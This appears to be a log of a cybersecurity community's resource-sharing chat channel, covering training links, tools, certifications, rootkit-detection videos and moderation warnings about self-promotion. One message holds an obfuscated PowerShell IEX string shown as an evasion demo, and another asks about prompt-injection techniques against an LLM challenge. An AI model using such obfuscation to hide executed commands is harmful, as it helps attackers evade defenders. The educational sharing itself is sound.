Hi, can anyone recommend any resources and/or THM rooms related to using ip route add. I'm trying to understand when to use this and why and I prefer practical examples to learn.
I found a few medium articles but still not 100% clear
Hi there, I'd like to share the tool that I've published recently for detecting Rogue Access Points & Hidden Access Points on 802.11 Networks:
CLI-based 802.11 Rogue (Fake) AP & Hidden AP Spotter - ccelikanil/GhostBeacon
Ohh. Interesting
new rustscan release (i sliocewd my fdinger so i cant write much hahahah) https://github.com/RustScan/RustScan/releases/tag/2.2.2
w
Hi! I'm currently looking for Ruby on Rails specific resources for finding vulnerabilities. I have looked at Rails 6, but I'm having trouble finding anything with Rails 7. I'm currently looking into the RailsGoat project by OWASP. Maybe there's some more resources or other communities you would recommend checking out?
Greg Molnar wrote a good blog post about a code auditing checklist:
https://greg.molnar.io/blog/secure-code-review-checklist/
also there's the official Rails Security Guide:
https://guides.rubyonrails.org/security.html
and the OWASP Rails Security Guide:
https://cheatsheetseries.owasp.org/cheatsheets/Ruby_on_Rails_Cheat_Sheet.html
as for understanding what changed between Rails 6 -> 7, see the changelog:
https://edgeguides.rubyonrails.org/7_0_release_notes.html
thanks you!
Gave +1 Rep to @austere marten (current: #299 - 16)
Please interact more before self promotion
Did you ever take the SC-200? @copper tangle
Please interact with the community before self promoting here
Thank you so much to Snyk for sponsoring this video. Sign up for Snyk for free to secure your products from the start: https://snyk.co/thecybermentor
Want more Rust? Check out the full Rust 101 course here: https://www.tcm.rocks/rust-y
Sponsor a Video: https://www.tcm.rocks/Sponsors
Pentests & Security Consulting: https://tcm-sec.com
Get Train...
You guys have to check this out
Thank you was looking for this
whatโs the best resource that helped you master IDOR vulnerability?
Learn more about Computer Science, Math, and AI with Brilliant! First 30 Days are free + 20% off an annual subscription when you use our link: https://brilliant.org/WackyScience/
How do Computers even work? Let's learn (pretty much) all of Computer Science in about 15 minutes with memes and bouncy music. At least the stuff worth remembering if ...
CompTIA PenTest+ Beta Exam is now available to book for an absolute steal (ยฃ36 compared to the usual ~ยฃ300).
Same with the new SecurityX cert (formerly known as CASP).
You can find them here: https://wsr.pearsonvue.com/testtaker/registration/SelectExamPage/COMPTIA/250068
And information about the new SecX: https://www.comptia.org/certifications/comptia-advanced-security-practitioner
Deadline for PenTest+ is 6 aug. Deadline for SecX is 23 July.
Read this after my architectures class and it was amazing how everything connected: https://cpu.land/
cool stuff
Those blue teamers who use suricata may find this interesting https://pawpatrules.fr/
Explore expert SOC Analyst notes curated for cybersecurity skill enhancement. Check out the GitHub repository https://github.com/MaheshShukla1/SOC-Analyst-Notes
is this your github?
yes
https://hackclub.com/arcade/
I Know a lot of young people are here, something for you to do over the summer (tinkering around AND getting free stuff!)
The International Monetary Fund on how governments should/could deal with the proliferation of AI
A critical distinction between gen AI and past disruptive technologies (such as the steam engine, electricity, and early computers) lies in its potential for rapid diffusion. The sheer scale and speed of the transformation pose risks to labor markets. While automation and robots have already displaced low- and middle-skill jobs involving routine tasks, gen AIโs capabilities extend to more intelligent automation, potentially amplifying job losses in cognitive occupations. Consequently, the labor income share in national income may further decline, exacerbating income and wealth inequality. Dominant firms in increasingly concentrated markets could reinforce their market power and enjoy monopoly rents. This note provides analysis and guidance for policymakers as they prepare for the transformative impact of gen AI.
https://www.imf.org/en/Publications/Staff-Discussion-Notes/Issues/2024/06/11/Broadening-the-Gains-from-Generative-AI-The-Role-of-Fiscal-Policies-549639
https://www.cyberark.com/resources/threat-research-blog/cracking-wifi-at-scale-with-one-simple-trick
anyone could recommend some good reverse engineering resources like free Books, online courses, or tutorials. Thanks in advance!
Thank you
Gave +1 Rep to @ripe adder (current: #1401 - 2)
Hey guys, HackerSploit here back again with another video. This video will introduce you to red teaming, and explain its origins and adoption in offensive cybersecurity. You will also learn about the key differences between Red Teaming and Penetration Testing. You will also be introduced to the various roles and responsibilities within a red tea...
#lkm #kernel #rootkit #linux
check out this awesome cheat sheet for windows forensics ๐
Started with the introtoshells room and figured that I'm lacking so much background knowledge. Found this nice writeup to get a foothold: https://thevaluable.dev/guide-terminal-shell-console/ which seems to be good, lighthearted and with many links.
this looks fun thank you
Gave +1 Rep to @stuck crag (current: #1409 - 2)
https://www.youtube.com/playlist?list=PLHJns8WZXCdu6kPwPpBhA0mfdB4ZuWy6M
Up your Ghidra game.
Hey @idle robin that isn't really a resource ๐
@ruby needle ?
๐
An educational puzzle game. Solve a series of tasks where you build increasingly powerful components. Starts with the simplest logical components and ends up with a programmable computer.
Nice
This video goes over linux modules.
Take your technical training into your own hands and stay engaged with our learn-by-doing platform where you can put your skills to the test with hands-on exercises, quizzes, and labs.
Check out https://get.ine.com/professorlinux
patreon.com/user?u=82503469
https://www.professorlinux.com
https://www.youtube....
FREE... CompTIA CloudNetX Beta exam at no cost
https://www.comptia.org/certifications/become-a-subject-matter-expert/comptia-cloudnetx-beta-exam
@sonic abyss and I have our first CVEs in the software Anki ๐ฅณ
My post: https://skerritt.blog/anki-0day/
Jayy's Post: https://skii.dev/anki-0day/
WHOOO
this is a really cool writeup!
this isnt 2 hours
I am unable to pass level 3
C2 servers of mobile and Windows malware are usually left to their own fate after they have been discovered and the malware is no longer effective. We are going to take a deep dive into the rabbit hole of attacking and owning C2 servers, exposing details about their infrastructure, code bases, and the identity of the companies and individuals th...
@icy bobcat is this your article..?
It's not mine but someone in LinkedIn shared it
Interesting that the author is identical to the last 4 articles you were promoting here?
Buddy its a free site you can write your articles there just dm the admin on Twitter
I posted some on them that doesn't mean it's my site
No, you were advertising them which is against the rules and you were warned that the next time you would be removed for doing it.
Am I advertising rn
I have a legit question that does anyone knows anything about Bluetooth hacking what the article says
Chill mate
If you post that website again you will be banned for continuously advertising without interacting with the community.
Haha
@icy bobcat has been warned.
Atleast i have higher rank tha you
Hey @keen pagoda can you interact with the community more before self promoting please
Okay understandable
So I've been doing some prompt engineering on LLMs for lakera ai's gandalf box. Anyone have resources I can read to learn more techniques and strategies? I'm stuck but I don't want just a hint, I wanna do my own research and really learn / develop this skill set.
There's very good resources on the gandalf website itself: https://gandalf.lakera.ai/pinj
Ty
This may have already been mentioned (and may only be for those of us in the US) https://www.gale.com/public You may have access to many courses through your local libraries. For example, I have access to all of linkedin learning, UDEMY Business, and many other resources that my local public libraries provide.
Gale's library solutions and resources can help your public library with collection development, databases, and more. Click to explore.
I have a question that I should have posted in this resource channel.
In the SOC level 1 path there is a room called TEMPEST that is in the capstone challenges at the end of the learning path.
There is a tool used in the attached VM called SysmonView.I want to find and download this tool on my personal computer so I can practice.
I clicked on a link provided in the room that goes to Eric Zimmerman's github page but SysmonView is not listed there.
I've searched the web for a place to download SysmonView with no luck.
Does anyone have an idea where I can find and download or obtain this resource so I can practice with my own copy of SysmonView?
64.zip
Jayy,
Sorry. I hit the enter before finishing.
You are awesome!!
Thank you so much.
yes?
Should I click on the "code" button or the "raw" button to get the download? I'm still kind of confused about all the different ways to do stuff on github.
Once again, Thank you so much!!
I have it downloaded and it runs fine on my computer.
Learn a simple way on how to detect and remove Kovid rootkit.
Has anyone tried this: https://www.youtube.com/watch?v=NWyqSbnsvGU&t=362s // https://github.com/Datalux/Osintgram/tree/v2?tab=readme-ov-file
Just tried it now but it does not work, unsure if I did something wrong.
become a HACKER (ethical) with ITProTV: (30% OFF): https://bit.ly/itprotvnetchuck or use code "networkchuck" (affiliate link)
Use a Python hacking tool called Osintgram to gather information about ethical hacking targets on Instagram.
VIDEO TOOLS
โก๏ธ Commands and walkthrough: https://ntck.co/...
That's very outdated
Oh... Then how do I find new resources ๐ญ
Don't watch Network Chuck 
gottem
Network chuck good in some stuff
Hi,
I wanna start a medium blog with some Walkthroughs for our French users because a lot of resources are in English. What I'm not allowed to reveal through that ? (Flags ? Some rooms ?)
Yeah, you're not allowed to reveal flags, tim recently done a post on this, I'll try and find it.
Ah it's ok, he pretty much just said no flags
To be sure I'll not post the flag itself, the most important thing is the path to find it
Learn a simple way on how to detect and remove Kovid rootkit.
This is nice, some devops stuff - https://sadservers.com/
Linux Troubleshooting Interview DevOps SRE
Please donโt self promote here
Are there any student sponsorships in cyber or tech in the US?
Trying to see what I can get for free.
Hello
Can anyone suggest a tool similar to Caldera Agent for Adversary Attack Simulation?
So Praise be to God, I finished a 10 video series on OWASP Topp 10 with examples and exploitations, check it if you want to;)
https://youtube.com/playlist?list=PL6PkfQ747yvZG9cXA5nOpO_8Q5z2Qd86o&si=uJStBiy3b3K5AuNe
next update will include stuff like i''Ex''""([cHaR]67+":\*\*e*\?''???''??K?''.*E") which is the same as the demo gif, but a bit more fancy
Great job man, keep it up ๐
cheers guys, appreciate it @steep turtle @jade shell
Couldn't find a better channel to drop this, so here it is: my windcorp series writeup, enjoy !
Ra, Ra2 and Set are complete, i'm still working on OSIRIS last step and will update the writeup soon enough ...
Please don't advertise here:)
This is not advertisement this is free cloud training sir ... U really want to prevent students from free labs
It was a link to your linkedin page:)
If you want to share the resource, please post a direct link without any referral links or redirects ๐
anybody have resource for Machine Learning in Security ?
Ice Bear need details on how to do kali linux partitions properly because Ice bear can't find it on official documentation
@latent kelp No self promotiuon please.
Learn how to detect and hide a LD_PRELOAD rootkit from ldd, /proc/pid/maps, etc.
Binarly researchers find a direct connection between the newly discovered Bootkitty Linux bootkit and exploitation of the LogoFAIL image parsing vulnerabilities reported more than a year ago
test
Posted ages ago now I know but these are cool
In case anyone wanted to know why attackers use reverse shells
Although there are legitimate uses for reverse shells, cybercriminals also use them to penetrate protected hosts and perform operating system commands. Reverse shells allow attackers to bypass network security mechanisms like firewalls.
What can i buy to learn more about cybersecurity? I got a $250 amazon gift card and i was thinking what to use for, and i thought that was a good idea to buy something that will help me have more experience in this field, so what is a resource that can help me learn more about cybersecurity? (Besides books)
might be good to sleep on it for a bit. depending what you are interested in it could be a goo resource for IOT devices, MCU's, wifi, red team devices etc if you get into stuff like that later. the THM platform has a massive repository of info to get started and find where you want to go with it.
Learn how to detect rootkit based on ftrace hooking.
Hey there, please respect our advertising guidelines (linking to other platforms) #rules ๐
so LDAP 101 :
Kerberos Authentication Process
- The user logs on, and their password is converted to an NTLM hash, which is used to encrypt the TGT ticket. This decouples the user's credentials from requests to resources.
- The KDC service on the DC checks the authentication service request (AS-REQ), verifies the user information, and creates a Ticket Granting Ticket (TGT), which is delivered to the user.
- The user presents the TGT to the DC, requesting a Ticket Granting Service (TGS) ticket for a specific service. This is the TGS-REQ. If the TGT is successfully validated, its data is copied to create a TGS ticket.
- The TGS is encrypted with the NTLM password hash of the service or computer account in whose context the service instance is running and is delivered to the user in the TGS_REP.
- The user presents the TGS to the service, and if it is valid, the user is permitted to connect to the resource (AP_REQ).
Hey everyone. Who can give an advice about setting home lab on like purple teaming. There will be like me trying to hack, also some SIEM maybe, where I can also look for logs and what happened. Which resources are good to build that kind of lab?
Soc Open Source is a Project Designed for Security Analysts and all SOC audiences who wants to play with implementation and explore the Modern SOC architecture. All of the components are used based on Open Source Projects(Available at the time of first commit).
This is Part-1, we will show the base of the model with ELK, TheHive- Cortex-MISP an...
Welcome to your one-stop guide for building a Free valuable Home SIEM Lab quickly and efficiently! This tutorial will help aspiring SOC analysts get practical experience without having the job yet.
Get Ahead in Your Cybersecurity Career: Practical experience is key in the cybersecurity field. This video provides you with actionable skills and ...
And maybe set it up on Kali purple
Hey, does THM have lots of osint rooms? I've done just about all the free ones that have been recommended to me, and I'm wondering if there are more. I just did Sakuraalmost without needing walkthrough hints. Got stuck one of the geolocation bits. (And apparently that room is supposed to be easy ๐) What are some good ones I should do next?
Particularly, I really enjoyed Sakura for how "real" it felt
Have you tried OhSint ๐ ?
I assume you already had a look at the pin messages especially this one?
Thanks a lot
Gave +1 Rep to @simple creek (current: #875 - 5)
I came across this resource Powershell scripts for Hackers and Pentesters as i was searching for "powershell for hackers"
https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters
fairly recent repo
I did! That one iirc I did without needing the walkthrough actually, that was fun ๐
ooh, I'd missed that actually ๐ I'll take a look!
ctf.cybersoc.wales seems to be a dead link btw
This one maybe ๐
@summer plinth Please interact more with community before posting own tools please.
Does this rule also applies for articles?
What do an H2HC talk and someone with curiosity have in common? A router to hack.
Awesome blog! :)
Thank you
Gave +1 Rep to @sonic abyss (current: #14 - 594)
Or โHow I how i passed the HTB CPTS exam without ever writing a pentest reportโ.
Useful for those trying to have a better methodology for report writing. Some good advice here in my opinion.
@idle robin @rain depot Great articles , thanks for sharing ๐
Gave +1 Rep to @idle robin (current: #114 - 67)
https://docs.sysreptor.com/htb-reporting-with-sysreptor/
This is the tool the article mentions, as well as the HTB templates for anybody who is interested.
does anyone have resources for computer organization/architecture
sysreptor is clunky af, you're better off spinning pwndoc-ng or something like that and customise it from there
https://pentestreports.com/applications for alternative tooling
View, publish and order pentest reports
Iโll have to check this out thank you.
Gave +1 Rep to @gritty barn (current: #217 - 33)
Book recommendations anyone
Ghost in the wires - Kevin mitnick
Can I find the PDF online?
Probably. I just rented it out on an online library free
A toolkit for open source researchers
linux for beginners resources please
Check this one out ๐